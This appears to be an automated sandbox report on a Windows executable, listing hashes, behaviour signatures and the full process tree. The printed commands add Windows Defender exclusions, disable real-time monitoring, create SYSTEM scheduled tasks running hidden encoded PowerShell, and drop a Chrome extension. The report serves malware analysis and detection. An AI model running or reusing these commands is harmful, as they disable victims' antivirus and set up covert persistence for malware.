Analysis

  • max time kernel
    129s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    11/07/2024, 22:40

General

  • Target

    c877d6d5e56cc8a52c34c49203322d0c33a95c2dd9fb558f1a069a1b841117ff.exe

  • Size

    7.3MB

  • MD5

    8e83a0d33c080fb12dd1e8b84dc2a5f9

  • SHA1

    3ed612adc379f6e0529dcb8eef015ccd5da06faf

  • SHA256

    c877d6d5e56cc8a52c34c49203322d0c33a95c2dd9fb558f1a069a1b841117ff

  • SHA512

    07fa4d2702491093c8efbfd52c9f4e795f31dcf7e4b87d98e21ebb90dbeddab7a9d494d5804e2c72fb280fa57da556d0ad9a718677cf15eae275758204714247

  • SSDEEP

    196608:91OTVZAnLjvxhU/KExKDQcqmhOcdEVfLqmYR7+mw4uPbjl:3OTPCBh2KhQPMOcdc+mC7+mluPbjl

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 24 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c877d6d5e56cc8a52c34c49203322d0c33a95c2dd9fb558f1a069a1b841117ff.exe
    "C:\Users\Admin\AppData\Local\Temp\c877d6d5e56cc8a52c34c49203322d0c33a95c2dd9fb558f1a069a1b841117ff.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1732
    • C:\Users\Admin\AppData\Local\Temp\7zSE476.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3044
      • C:\Users\Admin\AppData\Local\Temp\7zSEB68.tmp\Install.exe
        .\Install.exe /bRdOdidrvWct "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2764
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1760
          • C:\Windows\SysWOW64\cmd.exe
            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2748
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2688
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2684
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "bMfeDuSmKBAGoOfQBS" /SC once /ST 22:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb\wRfbUVGhINQtrUq\adRNGBp.exe\" NI /HPAdidNRyL 525403 /S" /V1 /F
          4⤵
          • Drops file in Windows directory
          • Scheduled Task/Job: Scheduled Task
          PID:2448
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 520
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:2148
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {66360C03-AC2F-4E1E-80B4-103026CD348D} S-1-5-18:NT AUTHORITY\System:Service:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2816
    • C:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb\wRfbUVGhINQtrUq\adRNGBp.exe
      C:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb\wRfbUVGhINQtrUq\adRNGBp.exe NI /HPAdidNRyL 525403 /S
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:324
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "gnuUUfYBm" /SC once /ST 06:49:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:332
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "gnuUUfYBm"
        3⤵
          PID:1364
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /DELETE /F /TN "gnuUUfYBm"
          3⤵
            PID:2260
          • C:\Windows\SysWOW64\cmd.exe
            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
            3⤵
              PID:2256
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                4⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:1940
            • C:\Windows\SysWOW64\cmd.exe
              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
              3⤵
                PID:2024
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                  4⤵
                  • Modifies Windows Defender Real-time Protection settings
                  PID:1784
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "gpeCEmdsM" /SC once /ST 14:45:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1048
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /run /I /tn "gpeCEmdsM"
                3⤵
                  PID:2524
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /DELETE /F /TN "gpeCEmdsM"
                  3⤵
                    PID:2340
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                    3⤵
                      PID:2388
                      • C:\Windows\SysWOW64\cmd.exe
                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                        4⤵
                          PID:692
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2496
                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                              6⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2076
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:32
                        3⤵
                          PID:2480
                          • C:\Windows\SysWOW64\reg.exe
                            REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:32
                            4⤵
                            • Windows security bypass
                            PID:624
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:64
                          3⤵
                            PID:2916
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:64
                              4⤵
                              • Windows security bypass
                              PID:1124
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:32
                            3⤵
                              PID:908
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:32
                                4⤵
                                  PID:2820
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:64
                                3⤵
                                  PID:2300
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:64
                                    4⤵
                                      PID:2868
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C copy nul "C:\Windows\Temp\WIjQsZOhtuiKSoXd\hzLlsoPy\YwCVDwWcehtqfhwo.wsf"
                                    3⤵
                                      PID:2832
                                    • C:\Windows\SysWOW64\wscript.exe
                                      wscript "C:\Windows\Temp\WIjQsZOhtuiKSoXd\hzLlsoPy\YwCVDwWcehtqfhwo.wsf"
                                      3⤵
                                      • Modifies data under HKEY_USERS
                                      PID:2788
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GtOnFDWCCgUn" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2532
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GtOnFDWCCgUn" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2616
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KDENuaOqQISU2" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2632
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KDENuaOqQISU2" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2664
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LAYqAmppRtojC" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:3060
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LAYqAmppRtojC" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2292
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\itCXZnYssICbfHKCXDR" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2108
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\itCXZnYssICbfHKCXDR" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2508
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZPMEzngU" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2572
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZPMEzngU" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2096
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\XKbpoCnULTQzsVVB" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:1244
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\XKbpoCnULTQzsVVB" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2736
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:1364
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:3000
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:944
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2732
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2452
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2476
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GtOnFDWCCgUn" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                          PID:2460
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GtOnFDWCCgUn" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                            PID:2136
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KDENuaOqQISU2" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                              PID:1196
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KDENuaOqQISU2" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                                PID:2124
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LAYqAmppRtojC" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                  PID:1784
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LAYqAmppRtojC" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                    PID:2008
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\itCXZnYssICbfHKCXDR" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                      PID:1048
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\itCXZnYssICbfHKCXDR" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                        PID:2524
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZPMEzngU" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                          PID:520
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZPMEzngU" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                            PID:1548
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\XKbpoCnULTQzsVVB" /t REG_DWORD /d 0 /reg:32
                                                            4⤵
                                                              PID:2560
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\XKbpoCnULTQzsVVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                                PID:2236
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                  PID:2724
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:1100
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb" /t REG_DWORD /d 0 /reg:32
                                                                    4⤵
                                                                      PID:1068
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb" /t REG_DWORD /d 0 /reg:64
                                                                      4⤵
                                                                        PID:776
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:32
                                                                        4⤵
                                                                          PID:1680
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:64
                                                                          4⤵
                                                                            PID:1576
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gjLsGzMLf" /SC once /ST 17:39:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          3⤵
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2772
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gjLsGzMLf"
                                                                          3⤵
                                                                            PID:1480
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /DELETE /F /TN "gjLsGzMLf"
                                                                            3⤵
                                                                              PID:1600
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                              3⤵
                                                                                PID:2808
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                  4⤵
                                                                                    PID:3052
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                  3⤵
                                                                                    PID:2628
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                      4⤵
                                                                                        PID:2160
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /CREATE /TN "NEaCSBqXysBCPlvqA" /SC once /ST 17:38:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WIjQsZOhtuiKSoXd\QBJFAnahrWxXzYu\ffeQVgT.exe\" d4 /AcUBdidzo 525403 /S" /V1 /F
                                                                                      3⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:1528
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /run /I /tn "NEaCSBqXysBCPlvqA"
                                                                                      3⤵
                                                                                        PID:2632
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 324 -s 488
                                                                                        3⤵
                                                                                        • Loads dropped DLL
                                                                                        • Program crash
                                                                                        PID:2664
                                                                                    • C:\Windows\Temp\WIjQsZOhtuiKSoXd\QBJFAnahrWxXzYu\ffeQVgT.exe
                                                                                      C:\Windows\Temp\WIjQsZOhtuiKSoXd\QBJFAnahrWxXzYu\ffeQVgT.exe d4 /AcUBdidzo 525403 /S
                                                                                      2⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Drops Chrome extension
                                                                                      • Drops file in System32 directory
                                                                                      • Drops file in Program Files directory
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:1564
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /DELETE /F /TN "bMfeDuSmKBAGoOfQBS"
                                                                                        3⤵
                                                                                          PID:1264
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                          3⤵
                                                                                            PID:964
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                              4⤵
                                                                                                PID:1532
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  5⤵
                                                                                                    PID:2880
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      6⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1316
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
